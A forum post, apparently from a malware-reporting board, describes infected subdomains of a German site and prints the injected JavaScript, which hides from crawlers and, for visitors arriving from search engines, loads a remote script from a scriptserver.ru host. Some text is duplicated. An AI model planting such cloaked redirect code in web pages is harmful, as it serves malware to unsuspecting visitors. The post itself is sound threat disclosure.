Recent Posts51
Malicious Domains / ausbildung-passgenau.de – a potpourri of badware!
« Last post by neeklamy on March 15, 2016, 09:47:18 pm »There’s a few subdomains at ausbildung-passgenau.de that have pages that if visited from a search engine results page (so there’s a certain document referrer), will then redirect to a randomised pick of malware, fake anti-virus and advertising sites.
Interestingly, it looks like only pages at the subdomains are infected. These are a few of the subdomains:
This is the JavaScript doing the dirty work:
Interestingly, it looks like only pages at the subdomains are infected. These are a few of the subdomains:
- fullfilescenter.ausbildung-passgenau.de
- newfiles2016.ausbildung-passgenau.de
- fastwindows2016.ausbildung-passgenau.de
This is the JavaScript doing the dirty work:
Code: [Select]
<script type="text/javascript">
(0 <= window.navigator.userAgent.indexOf("Rambler")
|| 0 <= window.navigator.userAgent.indexOf("Yandex")
|| 0 <= window.navigator.userAgent.indexOf("Google")
|| 0 <= window.navigator.userAgent.indexOf("Yaho")
|| 0 <= window.navigator.userAgent.indexOf("Googlebot")
|| 0 <= window.navigator.userAgent.indexOf("Turtle")) && Break();
var ref = document.referrer;
if (ref.length != 0) {
if ((ref.indexOf("yandex.") > 0 && ref.indexOf("text=") > 0)
|| (ref.indexOf("google.") > 0)
|| ref.indexOf("rambler.") > 0
|| ref.indexOf("bing.") > 0
|| ref.indexOf("mail.") > 0
|| ref.indexOf("yahoo.") > 0
|| ref.indexOf("msn.") > 0
|| ref.indexOf("live.") > 0
|| ref.indexOf("vk.") > 0
|| showme == 'force') {
document.write('<sc' + 'ript type="text/javascript" src="http://d2gyAAiuYBY2TUpxpe.scriptserver.ru/indianajones/index_download.js"></sc' + 'ript>');
}
}
</script>